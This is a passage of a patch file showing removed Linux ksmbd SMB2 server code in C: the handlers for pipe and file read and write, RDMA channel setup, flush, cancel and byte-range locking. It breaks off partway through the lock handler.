+-	rpc_resp = ksmbd_rpc_read(work->sess, id);
+-	if (rpc_resp) {
+-		if (rpc_resp->flags != KSMBD_RPC_OK) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		work->aux_payload_buf =
+-			kvmalloc(rpc_resp->payload_sz, GFP_KERNEL | __GFP_ZERO);
+-		if (!work->aux_payload_buf) {
+-			err = -ENOMEM;
+-			goto out;
+-		}
+-
+-		memcpy(work->aux_payload_buf, rpc_resp->payload,
+-		       rpc_resp->payload_sz);
+-
+-		nbytes = rpc_resp->payload_sz;
+-		work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
+-		work->aux_payload_sz = nbytes;
+-		kvfree(rpc_resp);
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(17);
+-	rsp->DataOffset = 80;
+-	rsp->Reserved = 0;
+-	rsp->DataLength = cpu_to_le32(nbytes);
+-	rsp->DataRemaining = 0;
+-	rsp->Flags = 0;
+-	inc_rfc1001_len(work->response_buf, nbytes);
+-	return 0;
+-
+-out:
+-	rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-	smb2_set_err_rsp(work);
+-	kvfree(rpc_resp);
+-	return err;
+-}
+-
+-static int smb2_set_remote_key_for_rdma(struct ksmbd_work *work,
+-					struct smb2_buffer_desc_v1 *desc,
+-					__le32 Channel,
+-					__le16 ChannelInfoLength)
+-{
+-	unsigned int i, ch_count;
+-
+-	if (work->conn->dialect == SMB30_PROT_ID &&
+-	    Channel != SMB2_CHANNEL_RDMA_V1)
+-		return -EINVAL;
+-
+-	ch_count = le16_to_cpu(ChannelInfoLength) / sizeof(*desc);
+-	if (ksmbd_debug_types & KSMBD_DEBUG_RDMA) {
+-		for (i = 0; i < ch_count; i++) {
+-			pr_info("RDMA r/w request %#x: token %#x, length %#x\n",
+-				i,
+-				le32_to_cpu(desc[i].token),
+-				le32_to_cpu(desc[i].length));
+-		}
+-	}
+-	if (!ch_count)
+-		return -EINVAL;
+-
+-	work->need_invalidate_rkey =
+-		(Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE);
+-	if (Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE)
+-		work->remote_key = le32_to_cpu(desc->token);
+-	return 0;
+-}
+-
+-static ssize_t smb2_read_rdma_channel(struct ksmbd_work *work,
+-				      struct smb2_read_req *req, void *data_buf,
+-				      size_t length)
+-{
+-	int err;
+-
+-	err = ksmbd_conn_rdma_write(work->conn, data_buf, length,
+-				    (struct smb2_buffer_desc_v1 *)
+-				    ((char *)req + le16_to_cpu(req->ReadChannelInfoOffset)),
+-				    le16_to_cpu(req->ReadChannelInfoLength));
+-	if (err)
+-		return err;
+-
+-	return length;
+-}
+-
+-/**
+- * smb2_read() - handler for smb2 read from file
+- * @work:	smb work containing read command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_read(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_read_req *req;
+-	struct smb2_read_rsp *rsp;
+-	struct ksmbd_file *fp = NULL;
+-	loff_t offset;
+-	size_t length, mincount;
+-	ssize_t nbytes = 0, remain_bytes = 0;
+-	int err = 0;
+-	bool is_rdma_channel = false;
+-	unsigned int max_read_size = conn->vals->max_read_size;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC pipe read request\n");
+-		return smb2_read_pipe(work);
+-	}
+-
+-	if (req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE ||
+-	    req->Channel == SMB2_CHANNEL_RDMA_V1) {
+-		is_rdma_channel = true;
+-		max_read_size = get_smbd_max_read_write_size();
+-	}
+-
+-	if (is_rdma_channel == true) {
+-		unsigned int ch_offset = le16_to_cpu(req->ReadChannelInfoOffset);
+-
+-		if (ch_offset < offsetof(struct smb2_read_req, Buffer)) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-		err = smb2_set_remote_key_for_rdma(work,
+-						   (struct smb2_buffer_desc_v1 *)
+-						   ((char *)req + ch_offset),
+-						   req->Channel,
+-						   req->ReadChannelInfoLength);
+-		if (err)
+-			goto out;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!fp) {
+-		err = -ENOENT;
+-		goto out;
+-	}
+-
+-	if (!(fp->daccess & (FILE_READ_DATA_LE | FILE_READ_ATTRIBUTES_LE))) {
+-		pr_err("Not permitted to read : 0x%x\n", fp->daccess);
+-		err = -EACCES;
+-		goto out;
+-	}
+-
+-	offset = le64_to_cpu(req->Offset);
+-	length = le32_to_cpu(req->Length);
+-	mincount = le32_to_cpu(req->MinimumCount);
+-
+-	if (length > max_read_size) {
+-		ksmbd_debug(SMB, "limiting read size to max size(%u)\n",
+-			    max_read_size);
+-		err = -EINVAL;
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
+-		    fp->filp, offset, length);
+-
+-	work->aux_payload_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
+-	if (!work->aux_payload_buf) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
+-
+-	nbytes = ksmbd_vfs_read(work, fp, length, &offset);
+-	if (nbytes < 0) {
+-		err = nbytes;
+-		goto out;
+-	}
+-
+-	if ((nbytes == 0 && length != 0) || nbytes < mincount) {
+-		kvfree(work->aux_payload_buf);
+-		work->aux_payload_buf = NULL;
+-		rsp->hdr.Status = STATUS_END_OF_FILE;
+-		smb2_set_err_rsp(work);
+-		ksmbd_fd_put(work, fp);
+-		return 0;
+-	}
+-
+-	ksmbd_debug(SMB, "nbytes %zu, offset %lld mincount %zu\n",
+-		    nbytes, offset, mincount);
+-
+-	if (is_rdma_channel == true) {
+-		/* write data to the client using rdma channel */
+-		remain_bytes = smb2_read_rdma_channel(work, req,
+-						      work->aux_payload_buf,
+-						      nbytes);
+-		kvfree(work->aux_payload_buf);
+-		work->aux_payload_buf = NULL;
+-
+-		nbytes = 0;
+-		if (remain_bytes < 0) {
+-			err = (int)remain_bytes;
+-			goto out;
+-		}
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(17);
+-	rsp->DataOffset = 80;
+-	rsp->Reserved = 0;
+-	rsp->DataLength = cpu_to_le32(nbytes);
+-	rsp->DataRemaining = cpu_to_le32(remain_bytes);
+-	rsp->Flags = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
+-	work->aux_payload_sz = nbytes;
+-	inc_rfc1001_len(work->response_buf, nbytes);
+-	ksmbd_fd_put(work, fp);
+-	return 0;
+-
+-out:
+-	if (err) {
+-		if (err == -EISDIR)
+-			rsp->hdr.Status = STATUS_INVALID_DEVICE_REQUEST;
+-		else if (err == -EAGAIN)
+-			rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
+-		else if (err == -ENOENT)
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		else if (err == -EACCES)
+-			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		else if (err == -ESHARE)
+-			rsp->hdr.Status = STATUS_SHARING_VIOLATION;
+-		else if (err == -EINVAL)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		else
+-			rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-
+-		smb2_set_err_rsp(work);
+-	}
+-	ksmbd_fd_put(work, fp);
+-	return err;
+-}
+-
+-/**
+- * smb2_write_pipe() - handler for smb2 write on IPC pipe
+- * @work:	smb work containing write IPC pipe command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static noinline int smb2_write_pipe(struct ksmbd_work *work)
+-{
+-	struct smb2_write_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_write_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_rpc_command *rpc_resp;
+-	u64 id = 0;
+-	int err = 0, ret = 0;
+-	char *data_buf;
+-	size_t length;
+-
+-	length = le32_to_cpu(req->Length);
+-	id = req->VolatileFileId;
+-
+-	if ((u64)le16_to_cpu(req->DataOffset) + length >
+-	    get_rfc1002_len(work->request_buf)) {
+-		pr_err("invalid write data offset %u, smb_len %u\n",
+-		       le16_to_cpu(req->DataOffset),
+-		       get_rfc1002_len(work->request_buf));
+-		err = -EINVAL;
+-		goto out;
+-	}
+-
+-	data_buf = (char *)(((char *)&req->hdr.ProtocolId) +
+-			   le16_to_cpu(req->DataOffset));
+-
+-	rpc_resp = ksmbd_rpc_write(work->sess, id, data_buf, length);
+-	if (rpc_resp) {
+-		if (rpc_resp->flags == KSMBD_RPC_ENOTIMPLEMENTED) {
+-			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-			kvfree(rpc_resp);
+-			smb2_set_err_rsp(work);
+-			return -EOPNOTSUPP;
+-		}
+-		if (rpc_resp->flags != KSMBD_RPC_OK) {
+-			rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-			smb2_set_err_rsp(work);
+-			kvfree(rpc_resp);
+-			return ret;
+-		}
+-		kvfree(rpc_resp);
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(17);
+-	rsp->DataOffset = 0;
+-	rsp->Reserved = 0;
+-	rsp->DataLength = cpu_to_le32(length);
+-	rsp->DataRemaining = 0;
+-	rsp->Reserved2 = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	return 0;
+-out:
+-	if (err) {
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		smb2_set_err_rsp(work);
+-	}
+-
+-	return err;
+-}
+-
+-static ssize_t smb2_write_rdma_channel(struct ksmbd_work *work,
+-				       struct smb2_write_req *req,
+-				       struct ksmbd_file *fp,
+-				       loff_t offset, size_t length, bool sync)
+-{
+-	char *data_buf;
+-	int ret;
+-	ssize_t nbytes;
+-
+-	data_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
+-	if (!data_buf)
+-		return -ENOMEM;
+-
+-	ret = ksmbd_conn_rdma_read(work->conn, data_buf, length,
+-				   (struct smb2_buffer_desc_v1 *)
+-				   ((char *)req + le16_to_cpu(req->WriteChannelInfoOffset)),
+-				   le16_to_cpu(req->WriteChannelInfoLength));
+-	if (ret < 0) {
+-		kvfree(data_buf);
+-		return ret;
+-	}
+-
+-	ret = ksmbd_vfs_write(work, fp, data_buf, length, &offset, sync, &nbytes);
+-	kvfree(data_buf);
+-	if (ret < 0)
+-		return ret;
+-
+-	return nbytes;
+-}
+-
+-/**
+- * smb2_write() - handler for smb2 write from file
+- * @work:	smb work containing write command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_write(struct ksmbd_work *work)
+-{
+-	struct smb2_write_req *req;
+-	struct smb2_write_rsp *rsp;
+-	struct ksmbd_file *fp = NULL;
+-	loff_t offset;
+-	size_t length;
+-	ssize_t nbytes;
+-	char *data_buf;
+-	bool writethrough = false, is_rdma_channel = false;
+-	int err = 0;
+-	unsigned int max_write_size = work->conn->vals->max_write_size;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC pipe write request\n");
+-		return smb2_write_pipe(work);
+-	}
+-
+-	offset = le64_to_cpu(req->Offset);
+-	length = le32_to_cpu(req->Length);
+-
+-	if (req->Channel == SMB2_CHANNEL_RDMA_V1 ||
+-	    req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE) {
+-		is_rdma_channel = true;
+-		max_write_size = get_smbd_max_read_write_size();
+-		length = le32_to_cpu(req->RemainingBytes);
+-	}
+-
+-	if (is_rdma_channel == true) {
+-		unsigned int ch_offset = le16_to_cpu(req->WriteChannelInfoOffset);
+-
+-		if (req->Length != 0 || req->DataOffset != 0 ||
+-		    ch_offset < offsetof(struct smb2_write_req, Buffer)) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-		err = smb2_set_remote_key_for_rdma(work,
+-						   (struct smb2_buffer_desc_v1 *)
+-						   ((char *)req + ch_offset),
+-						   req->Channel,
+-						   req->WriteChannelInfoLength);
+-		if (err)
+-			goto out;
+-	}
+-
+-	if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-		ksmbd_debug(SMB, "User does not have write permission\n");
+-		err = -EACCES;
+-		goto out;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!fp) {
+-		err = -ENOENT;
+-		goto out;
+-	}
+-
+-	if (!(fp->daccess & (FILE_WRITE_DATA_LE | FILE_READ_ATTRIBUTES_LE))) {
+-		pr_err("Not permitted to write : 0x%x\n", fp->daccess);
+-		err = -EACCES;
+-		goto out;
+-	}
+-
+-	if (length > max_write_size) {
+-		ksmbd_debug(SMB, "limiting write size to max size(%u)\n",
+-			    max_write_size);
+-		err = -EINVAL;
+-		goto out;
+-	}
+-
+-	ksmbd_debug(SMB, "flags %u\n", le32_to_cpu(req->Flags));
+-	if (le32_to_cpu(req->Flags) & SMB2_WRITEFLAG_WRITE_THROUGH)
+-		writethrough = true;
+-
+-	if (is_rdma_channel == false) {
+-		if (le16_to_cpu(req->DataOffset) <
+-		    offsetof(struct smb2_write_req, Buffer)) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		data_buf = (char *)(((char *)&req->hdr.ProtocolId) +
+-				    le16_to_cpu(req->DataOffset));
+-
+-		ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
+-			    fp->filp, offset, length);
+-		err = ksmbd_vfs_write(work, fp, data_buf, length, &offset,
+-				      writethrough, &nbytes);
+-		if (err < 0)
+-			goto out;
+-	} else {
+-		/* read data from the client using rdma channel, and
+-		 * write the data.
+-		 */
+-		nbytes = smb2_write_rdma_channel(work, req, fp, offset, length,
+-						 writethrough);
+-		if (nbytes < 0) {
+-			err = (int)nbytes;
+-			goto out;
+-		}
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(17);
+-	rsp->DataOffset = 0;
+-	rsp->Reserved = 0;
+-	rsp->DataLength = cpu_to_le32(nbytes);
+-	rsp->DataRemaining = 0;
+-	rsp->Reserved2 = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	ksmbd_fd_put(work, fp);
+-	return 0;
+-
+-out:
+-	if (err == -EAGAIN)
+-		rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
+-	else if (err == -ENOSPC || err == -EFBIG)
+-		rsp->hdr.Status = STATUS_DISK_FULL;
+-	else if (err == -ENOENT)
+-		rsp->hdr.Status = STATUS_FILE_CLOSED;
+-	else if (err == -EACCES)
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	else if (err == -ESHARE)
+-		rsp->hdr.Status = STATUS_SHARING_VIOLATION;
+-	else if (err == -EINVAL)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	else
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-
+-	smb2_set_err_rsp(work);
+-	ksmbd_fd_put(work, fp);
+-	return err;
+-}
+-
+-/**
+- * smb2_flush() - handler for smb2 flush file - fsync
+- * @work:	smb work containing flush command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_flush(struct ksmbd_work *work)
+-{
+-	struct smb2_flush_req *req;
+-	struct smb2_flush_rsp *rsp;
+-	int err;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	ksmbd_debug(SMB, "SMB2_FLUSH called for fid %llu\n", req->VolatileFileId);
+-
+-	err = ksmbd_vfs_fsync(work, req->VolatileFileId, req->PersistentFileId);
+-	if (err)
+-		goto out;
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	return 0;
+-
+-out:
+-	if (err) {
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		smb2_set_err_rsp(work);
+-	}
+-
+-	return err;
+-}
+-
+-/**
+- * smb2_cancel() - handler for smb2 cancel command
+- * @work:	smb work containing cancel command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_cancel(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+-	struct smb2_hdr *chdr;
+-	struct ksmbd_work *iter;
+-	struct list_head *command_list;
+-
+-	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
+-		    hdr->MessageId, hdr->Flags);
+-
+-	if (hdr->Flags & SMB2_FLAGS_ASYNC_COMMAND) {
+-		command_list = &conn->async_requests;
+-
+-		spin_lock(&conn->request_lock);
+-		list_for_each_entry(iter, command_list,
+-				    async_request_entry) {
+-			chdr = smb2_get_msg(iter->request_buf);
+-
+-			if (iter->async_id !=
+-			    le64_to_cpu(hdr->Id.AsyncId))
+-				continue;
+-
+-			ksmbd_debug(SMB,
+-				    "smb2 with AsyncId %llu cancelled command = 0x%x\n",
+-				    le64_to_cpu(hdr->Id.AsyncId),
+-				    le16_to_cpu(chdr->Command));
+-			iter->state = KSMBD_WORK_CANCELLED;
+-			if (iter->cancel_fn)
+-				iter->cancel_fn(iter->cancel_argv);
+-			break;
+-		}
+-		spin_unlock(&conn->request_lock);
+-	} else {
+-		command_list = &conn->requests;
+-
+-		spin_lock(&conn->request_lock);
+-		list_for_each_entry(iter, command_list, request_entry) {
+-			chdr = smb2_get_msg(iter->request_buf);
+-
+-			if (chdr->MessageId != hdr->MessageId ||
+-			    iter == work)
+-				continue;
+-
+-			ksmbd_debug(SMB,
+-				    "smb2 with mid %llu cancelled command = 0x%x\n",
+-				    le64_to_cpu(hdr->MessageId),
+-				    le16_to_cpu(chdr->Command));
+-			iter->state = KSMBD_WORK_CANCELLED;
+-			break;
+-		}
+-		spin_unlock(&conn->request_lock);
+-	}
+-
+-	/* For SMB2_CANCEL command itself send no response*/
+-	work->send_no_response = 1;
+-	return 0;
+-}
+-
+-struct file_lock *smb_flock_init(struct file *f)
+-{
+-	struct file_lock *fl;
+-
+-	fl = locks_alloc_lock();
+-	if (!fl)
+-		goto out;
+-
+-	locks_init_lock(fl);
+-
+-	fl->fl_owner = f;
+-	fl->fl_pid = current->tgid;
+-	fl->fl_file = f;
+-	fl->fl_flags = FL_POSIX;
+-	fl->fl_ops = NULL;
+-	fl->fl_lmops = NULL;
+-
+-out:
+-	return fl;
+-}
+-
+-static int smb2_set_flock_flags(struct file_lock *flock, int flags)
+-{
+-	int cmd = -EINVAL;
+-
+-	/* Checking for wrong flag combination during lock request*/
+-	switch (flags) {
+-	case SMB2_LOCKFLAG_SHARED:
+-		ksmbd_debug(SMB, "received shared request\n");
+-		cmd = F_SETLKW;
+-		flock->fl_type = F_RDLCK;
+-		flock->fl_flags |= FL_SLEEP;
+-		break;
+-	case SMB2_LOCKFLAG_EXCLUSIVE:
+-		ksmbd_debug(SMB, "received exclusive request\n");
+-		cmd = F_SETLKW;
+-		flock->fl_type = F_WRLCK;
+-		flock->fl_flags |= FL_SLEEP;
+-		break;
+-	case SMB2_LOCKFLAG_SHARED | SMB2_LOCKFLAG_FAIL_IMMEDIATELY:
+-		ksmbd_debug(SMB,
+-			    "received shared & fail immediately request\n");
+-		cmd = F_SETLK;
+-		flock->fl_type = F_RDLCK;
+-		break;
+-	case SMB2_LOCKFLAG_EXCLUSIVE | SMB2_LOCKFLAG_FAIL_IMMEDIATELY:
+-		ksmbd_debug(SMB,
+-			    "received exclusive & fail immediately request\n");
+-		cmd = F_SETLK;
+-		flock->fl_type = F_WRLCK;
+-		break;
+-	case SMB2_LOCKFLAG_UNLOCK:
+-		ksmbd_debug(SMB, "received unlock request\n");
+-		flock->fl_type = F_UNLCK;
+-		cmd = 0;
+-		break;
+-	}
+-
+-	return cmd;
+-}
+-
+-static struct ksmbd_lock *smb2_lock_init(struct file_lock *flock,
+-					 unsigned int cmd, int flags,
+-					 struct list_head *lock_list)
+-{
+-	struct ksmbd_lock *lock;
+-
+-	lock = kzalloc(sizeof(struct ksmbd_lock), GFP_KERNEL);
+-	if (!lock)
+-		return NULL;
+-
+-	lock->cmd = cmd;
+-	lock->fl = flock;
+-	lock->start = flock->fl_start;
+-	lock->end = flock->fl_end;
+-	lock->flags = flags;
+-	if (lock->start == lock->end)
+-		lock->zero_len = 1;
+-	INIT_LIST_HEAD(&lock->clist);
+-	INIT_LIST_HEAD(&lock->flist);
+-	INIT_LIST_HEAD(&lock->llist);
+-	list_add_tail(&lock->llist, lock_list);
+-
+-	return lock;
+-}
+-
+-static void smb2_remove_blocked_lock(void **argv)
+-{
+-	struct file_lock *flock = (struct file_lock *)argv[0];
+-
+-	ksmbd_vfs_posix_lock_unblock(flock);
+-	wake_up(&flock->fl_wait);
+-}
+-
+-static inline bool lock_defer_pending(struct file_lock *fl)
+-{
+-	/* check pending lock waiters */
+-	return waitqueue_active(&fl->fl_wait);
+-}
+-
+-/**
+- * smb2_lock() - handler for smb2 file lock command
+- * @work:	smb work containing lock command buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_lock(struct ksmbd_work *work)
+-{
+-	struct smb2_lock_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_lock_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct smb2_lock_element *lock_ele;
+-	struct ksmbd_file *fp = NULL;
+-	struct file_lock *flock = NULL;
+-	struct file *filp = NULL;
+-	int lock_count;
+-	int flags = 0;
+-	int cmd = 0;
+-	int err = -EIO, i, rc = 0;
+-	u64 lock_start, lock_length;
+-	struct ksmbd_lock *smb_lock = NULL, *cmp_lock, *tmp, *tmp2;
+-	struct ksmbd_conn *conn;
+-	int nolock = 0;
+-	LIST_HEAD(lock_list);
+-	LIST_HEAD(rollback_list);
+-	int prior_lock = 0;
+-
+-	ksmbd_debug(SMB, "Received lock request\n");
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+-	if (!fp) {
+-		ksmbd_debug(SMB, "Invalid file id for lock : %llu\n", req->VolatileFileId);
+-		err = -ENOENT;
+-		goto out2;
+-	}
+-
+-	filp = fp->filp;
+-	lock_count = le16_to_cpu(req->LockCount);
+-	lock_ele = req->locks;
+-
+-	ksmbd_debug(SMB, "lock count is %d\n", lock_count);
+-	if (!lock_count) {
+-		err = -EINVAL;
+-		goto out2;
+-	}
+-
+-	for (i = 0; i < lock_count; i++) {
+-		flags = le32_to_cpu(lock_ele[i].Flags);
+-
+-		flock = smb_flock_init(filp);
+-		if (!flock)
+-			goto out;
+-
+-		cmd = smb2_set_flock_flags(flock, flags);
+-
+-		lock_start = le64_to_cpu(lock_ele[i].Offset);
+-		lock_length = le64_to_cpu(lock_ele[i].Length);
+-		if (lock_start > U64_MAX - lock_length) {
+-			pr_err("Invalid lock range requested\n");
+-			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
+-			goto out;
+-		}
+-
+-		if (lock_start > OFFSET_MAX)
+-			flock->fl_start = OFFSET_MAX;
+-		else
+-			flock->fl_start = lock_start;
+-
+-		lock_length = le64_to_cpu(lock_ele[i].Length);
+-		if (lock_length > OFFSET_MAX - flock->fl_start)
+-			lock_length = OFFSET_MAX - flock->fl_start;
+-
+-		flock->fl_end = flock->fl_start + lock_length;
+-
+-		if (flock->fl_end < flock->fl_start) {
+-			ksmbd_debug(SMB,
+-				    "the end offset(%llx) is smaller than the start offset(%llx)\n",
+-				    flock->fl_end, flock->fl_start);
+-			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
+-			goto out;
+-		}
+-
+-		/* Check conflict locks in one request */
+-		list_for_each_entry(cmp_lock, &lock_list, llist) {
+-			if (cmp_lock->fl->fl_start <= flock->fl_start &&
+-			    cmp_lock->fl->fl_end >= flock->fl_end) {
+-				if (cmp_lock->fl->fl_type != F_UNLCK &&
+-				    flock->fl_type != F_UNLCK) {
+-					pr_err("conflict two locks in one request\n");
+-					err = -EINVAL;
+-					goto out;
+-				}
+-			}
+-		}
+-
+-		smb_lock = smb2_lock_init(flock, cmd, flags, &lock_list);
+-		if (!smb_lock) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-	}
+-
+-	list_for_each_entry_safe(smb_lock, tmp, &lock_list, llist) {
+-		if (smb_lock->cmd < 0) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		if (!(smb_lock->flags & SMB2_LOCKFLAG_MASK)) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		if ((prior_lock & (SMB2_LOCKFLAG_EXCLUSIVE | SMB2_LOCKFLAG_SHARED) &&
+-		     smb_lock->flags & SMB2_LOCKFLAG_UNLOCK) ||
+-		    (prior_lock == SMB2_LOCKFLAG_UNLOCK &&
+-		     !(smb_lock->flags & SMB2_LOCKFLAG_UNLOCK))) {
+-			err = -EINVAL;
+-			goto out;
+-		}
+-
+-		prior_lock = smb_lock->flags;
+-
+-		if (!(smb_lock->flags & SMB2_LOCKFLAG_UNLOCK) &&
+-		    !(smb_lock->flags & SMB2_LOCKFLAG_FAIL_IMMEDIATELY))
+-			goto no_check_cl;
+-
+-		nolock = 1;
+-		/* check locks in connection list */
+-		down_read(&conn_list_lock);
+-		list_for_each_entry(conn, &conn_list, conns_list) {
+-			spin_lock(&conn->llist_lock);
+-			list_for_each_entry_safe(cmp_lock, tmp2, &conn->lock_list, clist) {
+-				if (file_inode(cmp_lock->fl->fl_file) !=
+-				    file_inode(smb_lock->fl->fl_file))
+-					continue;
+-
+-				if (smb_lock->fl->fl_type == F_UNLCK) {
+-					if (cmp_lock->fl->fl_file == smb_lock->fl->fl_file &&
+-					    cmp_lock->start == smb_lock->start &&
+-					    cmp_lock->end == smb_lock->end &&
+-					    !lock_defer_pending(cmp_lock->fl)) {
+-						nolock = 0;
+-						list_del(&cmp_lock->flist);
+-						list_del(&cmp_lock->clist);
+-						spin_unlock(&conn->llist_lock);
+-						up_read(&conn_list_lock);
+-
+-						locks_free_lock(cmp_lock->fl);
+-						kfree(cmp_lock);
+-						goto out_check_cl;
+-					}
+-					continue;
+-				}
+-
+-				if (cmp_lock->fl->fl_file == smb_lock->fl->fl_file) {
+-					if (smb_lock->flags & SMB2_LOCKFLAG_SHARED)
+-						continue;
+-				} else {
+-					if (cmp_lock->flags & SMB2_LOCKFLAG_SHARED)
+-						continue;
+-				}
+-
+-				/* check zero byte lock range */
+-				if (cmp_lock->zero_len && !smb_lock->zero_len &&
+-				    cmp_lock->start > smb_lock->start &&
+-				    cmp_lock->start < smb_lock->end) {
+-					spin_unlock(&conn->llist_lock);
+-					up_read(&conn_list_lock);
+-					pr_err("previous lock conflict with zero byte lock range\n");
+-					goto out;
+-				}
+-
+-				if (smb_lock->zero_len && !cmp_lock->zero_len &&
+-				    smb_lock->start > cmp_lock->start &&
+-				    smb_lock->start < cmp_lock->end) {
+-					spin_unlock(&conn->llist_lock);
+-					up_read(&conn_list_lock);
+-					pr_err("current lock conflict with zero byte lock range\n");
+-					goto out;
+-				}
+-
+-				if (((cmp_lock->start <= smb_lock->start &&
+-				      cmp_lock->end > smb_lock->start) ||
+-				     (cmp_lock->start < smb_lock->end &&
+-				      cmp_lock->end >= smb_lock->end)) &&
+-				    !cmp_lock->zero_len && !smb_lock->zero_len) {
+-					spin_unlock(&conn->llist_lock);
+-					up_read(&conn_list_lock);
+-					pr_err("Not allow lock operation on exclusive lock range\n");
+-					goto out;
+-				}
+-			}
+-			spin_unlock(&conn->llist_lock);
+-		}
+-		up_read(&conn_list_lock);
+-out_check_cl:
+-		if (smb_lock->fl->fl_type == F_UNLCK && nolock) {
+-			pr_err("Try to unlock nolocked range\n");
+-			rsp->hdr.Status = STATUS_RANGE_NOT_LOCKED;
+-			goto out;
+-		}
+-
+-no_check_cl:
+-		if (smb_lock->zero_len) {
+-			err = 0;
+-			goto skip;
+-		}
+-
+-		flock = smb_lock->fl;
+-		list_del(&smb_lock->llist);
+-retry:
+-		rc = vfs_lock_file(filp, smb_lock->cmd, flock, NULL);
+-skip:
+-		if (flags & SMB2_LOCKFLAG_UNLOCK) {
+-			if (!rc) {
+-				ksmbd_debug(SMB, "File unlocked\n");
+-			} else if (rc == -ENOENT) {
+-				rsp->hdr.Status = STATUS_NOT_LOCKED;
+-				goto out;
+-			}
+-			locks_free_lock(flock);
+-			kfree(smb_lock);
+-		} else {
+-			if (rc == FILE_LOCK_DEFERRED) {
+-				void **argv;
+-
+-				ksmbd_debug(SMB,
+-					    "would have to wait for getting lock\n");
+-				spin_lock(&work->conn->llist_lock);
+-				list_add_tail(&smb_lock->clist,
+-					      &work->conn->lock_list);
+-				spin_unlock(&work->conn->llist_lock);
+-				list_add(&smb_lock->llist, &rollback_list);
+-
+-				argv = kmalloc(sizeof(void *), GFP_KERNEL);
+-				if (!argv) {
+-					err = -ENOMEM;
+-					goto out;
+-				}
+-				argv[0] = flock;
+-
+-				rc = setup_async_work(work,
+-						      smb2_remove_blocked_lock,
+-						      argv);
+-				if (rc) {
+-					err = -ENOMEM;
+-					goto out;
+-				}
+-				spin_lock(&fp->f_lock);
+-				list_add(&work->fp_entry, &fp->blocked_works);
+-				spin_unlock(&fp->f_lock);
+-
+-				smb2_send_interim_resp(work, STATUS_PENDING);
+-
+-				ksmbd_vfs_posix_lock_wait(flock);
+-
+-				spin_lock(&work->conn->request_lock);
+-				spin_lock(&fp->f_lock);
+-				list_del(&work->fp_entry);
+-				work->cancel_fn = NULL;
+-				kfree(argv);
+-				spin_unlock(&fp->f_lock);
+-				spin_unlock(&work->conn->request_lock);
+-
